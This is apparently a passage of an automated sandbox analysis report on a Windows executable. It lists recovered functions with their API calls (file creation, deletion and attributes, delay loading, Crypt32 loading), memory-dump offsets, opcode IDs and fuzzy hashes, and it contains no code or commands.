                                        • Instruction Fuzzy Hash: 35B012E92FD080AC3509A2071D12D3B018DC0C2B11771813EF809C40C0ED806D951831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EEAF9
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: 3Ro
                                        • API String ID: 1269201914-1492261280
                                        • Opcode ID: 7b1ca525c62002050e8a6b62852eec5d518ec4d03eb2edfe4ca5c75686600d30
                                        • Instruction ID: d8b4b0e686af1bc618c619955cdaf91160f2fdf86625925cc31d58211c5bf7d2
                                        • Opcode Fuzzy Hash: 7b1ca525c62002050e8a6b62852eec5d518ec4d03eb2edfe4ca5c75686600d30
                                        • Instruction Fuzzy Hash: 1FB0928A2FA0827C6909A2021992C360109D080BA0361912EF4058409198814C550832
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: PDu<.
                                        • API String ID: 1269201914-3708720079
                                        • Opcode ID: 5bf4fbeb3e28248bed4fc7726ca97e8c57a308255385ddfbf59a898413906fb6
                                        • Instruction ID: cd70cfc7ea6d0bef8747ae51a77cbc8bcd52edb7d03c7fa0b3ddf637a35e0db7
                                        • Opcode Fuzzy Hash: 5bf4fbeb3e28248bed4fc7726ca97e8c57a308255385ddfbf59a898413906fb6
                                        • Instruction Fuzzy Hash: 9BB012C52F94807C750952261D16C3B010DC0C1F10BF1913EF451C04D1A8800D180831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: PDu<.
                                        • API String ID: 1269201914-3708720079
                                        • Opcode ID: 989ab472b9ee2ef233251a9bf6a1262a510e071e4f22f87cd64e02a833c573b5
                                        • Instruction ID: 48ffc4ffe77263337511ad30c70d0d4aa6922b47b47ddb7450b5cee585696938
                                        • Opcode Fuzzy Hash: 989ab472b9ee2ef233251a9bf6a1262a510e071e4f22f87cd64e02a833c573b5
                                        • Instruction Fuzzy Hash: 9CB012C52F95807C7609920A5C53C3B010DC0C1F117F1932EF405C00C0E8800C580831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE580
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Fjun.
                                        • API String ID: 1269201914-344076011
                                        • Opcode ID: 935e4697b1c90c8df536e5eac8db1484571988ec697e3c640b5372c071ab411f
                                        • Instruction ID: aa5265f85ea63b72065fca728a4d032bfe52ac7fdd3dd8aa65c5a0bdd3b94d5f
                                        • Opcode Fuzzy Hash: 935e4697b1c90c8df536e5eac8db1484571988ec697e3c640b5372c071ab411f
                                        • Instruction Fuzzy Hash: 1FB012C56F90807D7515A3565D13C37011DC0C0B107F6932EF404C10C0EC810D691831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE580
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Fjun.
                                        • API String ID: 1269201914-344076011
                                        • Opcode ID: 5d4a2c133b14eb41190ad0e26b70e14e80fd924ab04476c8ccaa36a92666a2f2
                                        • Instruction ID: d33c9b2a86b129bfaa261baf7d2d6a7a2d5504e965710a9776141475694fbe6c
                                        • Opcode Fuzzy Hash: 5d4a2c133b14eb41190ad0e26b70e14e80fd924ab04476c8ccaa36a92666a2f2
                                        • Instruction Fuzzy Hash: 2BB012C56F91807D7555A3565C13C37011DC0C0B117B6932EF404C10C0E8C00C680831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE580
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Fjun.
                                        • API String ID: 1269201914-344076011
                                        • Opcode ID: 1519243ebf7998657f20b603ca5a9bcb8097b16c269a69ed19eb1495236a7640
                                        • Instruction ID: 687fe67bd2984c5528b0d4358bf5ad021255ffb01f2e88555023816d13a8840b
                                        • Opcode Fuzzy Hash: 1519243ebf7998657f20b603ca5a9bcb8097b16c269a69ed19eb1495236a7640
                                        • Instruction Fuzzy Hash: 73B012C56F91847E7515A3561C13C37010DD0C0B117B2922EF404C50C0E8840C280831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 517a430ba08feaec123f0d7e1c237fd192b33418528c25f778448ec0e9e7bba9
                                        • Instruction ID: c5dc84f0bb09ad69ee207228c7aee414995be7eb5b8d14f85235adbb1f453b81
                                        • Opcode Fuzzy Hash: 517a430ba08feaec123f0d7e1c237fd192b33418528c25f778448ec0e9e7bba9
                                        • Instruction Fuzzy Hash: CBA002D51F9181BC750952535D16D7B011DC4C6B51371552DF816C44D169906C551875
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 7b01bc4440e8d4a90c7e16c5bb3e7440c131f8a1be6a794881919c9b52149866
                                        • Instruction ID: c5dc84f0bb09ad69ee207228c7aee414995be7eb5b8d14f85235adbb1f453b81
                                        • Opcode Fuzzy Hash: 7b01bc4440e8d4a90c7e16c5bb3e7440c131f8a1be6a794881919c9b52149866
                                        • Instruction Fuzzy Hash: CBA002D51F9181BC750952535D16D7B011DC4C6B51371552DF816C44D169906C551875
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: PDu<.
                                        • API String ID: 1269201914-3708720079
                                        • Opcode ID: 09287b4687705b1d317d769f2b820e7a2b1bf688f81d69b8b710ae166728fc0e
                                        • Instruction ID: 8fb8528ec882d31bed06f44636133f123d9007136ee5a784c913186855fedc6b
                                        • Opcode Fuzzy Hash: 09287b4687705b1d317d769f2b820e7a2b1bf688f81d69b8b710ae166728fc0e
                                        • Instruction Fuzzy Hash: AAA011C22FA882BCB808A2022C22C3B020EC0C2F203F2AA2EF802800C0A8800C280830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE580
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Fjun.
                                        • API String ID: 1269201914-344076011
                                        • Opcode ID: e757c97daa9918dfb4b8d4ee33d34295e8a72870d5cf982331e842a56ff5e67e
                                        • Instruction ID: a498968f763d13764aab7ffa16e63babea6d978a3bc3fdceb5b690a93c3a8fe4
                                        • Opcode Fuzzy Hash: e757c97daa9918dfb4b8d4ee33d34295e8a72870d5cf982331e842a56ff5e67e
                                        • Instruction Fuzzy Hash: 3FA011C22FA0803CB828A3A22C23C3B020EC0C0B223B2A32EF800800C0A88008280830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: PDu<.
                                        • API String ID: 1269201914-3708720079
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: PDu<.
                                        • API String ID: 1269201914-3708720079
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: PDu<.
                                        • API String ID: 1269201914-3708720079
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE580
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Fjun.
                                        • API String ID: 1269201914-344076011
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE580
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Fjun.
                                        • API String ID: 1269201914-344076011
                                        APIs
                                          • Part of subcall function 002FB7BB: GetOEMCP.KERNEL32(00000000,?,?,002FBA44,?), ref: 002FB7E6
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,002FBA89,?,00000000), ref: 002FBC64
                                        • GetCPInfo.KERNEL32(00000000,002FBA89,?,?,?,002FBA89,?,00000000), ref: 002FBC77
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID:
                                        • API String ID: 546120528-0
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,002D9A50,?,?,00000000,?,?,002D8CBC,?), ref: 002D9BAB
                                        • GetLastError.KERNEL32(?,00000000,002D8411,-00009570,00000000,000007F3), ref: 002D9BB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D1E55
                                          • Part of subcall function 002D3BBA: __EH_prolog.LIBCMT ref: 002D3BBF
                                        • _wcslen.LIBCMT ref: 002D1EFD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: H_prolog$_wcslen
                                        • String ID:
                                        • API String ID: 2838827086-0
                                        APIs
                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002D73BC,?,?,?,00000000), ref: 002D9DBC
                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 002D9E70
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: File$BuffersFlushTime
                                        • String ID:
                                        • API String ID: 1392018926-0
                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,002D9F27,?,?,002D771A), ref: 002D96E6
                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,002D9F27,?,?,002D771A), ref: 002D9716
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 002D9EC7
                                        • GetLastError.KERNEL32 ref: 002D9ED4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        APIs
                                        • _free.LIBCMT ref: 002F8E75
                                          • Part of subcall function 002F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002FCA2C,00000000,?,002F6CBE,?,00000008,?,002F91E0,?,?,?), ref: 002F8E38
                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00311098,002D17CE,?,?,00000007,?,?,?,002D13D6,?,00000000), ref: 002F8EB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: Heap$AllocAllocate_free
                                        • String ID:
                                        • API String ID: 2447670028-0
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?), ref: 002E10AB
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 002E10B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA501
                                          • Part of subcall function 002DBB03: _wcslen.LIBCMT ref: 002DBB27
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,002DA325,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA532
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AttributesFile$_wcslen
                                        • String ID:
                                        • API String ID: 2673547680-0
                                        APIs
                                        • DeleteFileW.KERNELBASE(000000FF,?,?,002D977F,?,?,002D95CF,?,?,?,?,?,00302641,000000FF), ref: 002DA1F1
                                          • Part of subcall function 002DBB03: _wcslen.LIBCMT ref: 002DBB27
                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,002D977F,?,?,002D95CF,?,?,?,?,?,00302641), ref: 002DA21F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: DeleteFile$_wcslen
                                        • String ID:
                                        • API String ID: 2643169976-0
                                        APIs
                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00302641,000000FF), ref: 002EACB0
                                        • CoUninitialize.COMBASE(?,?,?,?,00302641,000000FF), ref: 002EACB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: GdiplusShutdownUninitialize
                                        • String ID:
                                        • API String ID: 3856339756-0
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,002DA23A,?,002D755C,?,?,?,?), ref: 002DA254
                                          • Part of subcall function 002DBB03: _wcslen.LIBCMT ref: 002DBB27
                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,002DA23A,?,002D755C,?,?,?,?), ref: 002DA280
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: AttributesFile$_wcslen
                                        • String ID:
                                        • API String ID: 2673547680-0
                                        APIs
                                        • _swprintf.LIBCMT ref: 002EDEEC
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • SetDlgItemTextW.USER32(00000065,?), ref: 002EDF03
                                          • Part of subcall function 002EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002EB579
                                          • Part of subcall function 002EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EB58A
                                          • Part of subcall function 002EB568: IsDialogMessageW.USER32(00010456,?), ref: 002EB59E
                                          • Part of subcall function 002EB568: TranslateMessage.USER32(?), ref: 002EB5AC
                                          • Part of subcall function 002EB568: DispatchMessageW.USER32(?), ref: 002EB5B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                        • String ID:
                                        • API String ID: 2718869927-0
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002E0836
                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,002DF2D8,Crypt32.dll,00000000,002DF35C,?,?,002DF33E,?,?,?), ref: 002E0858
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
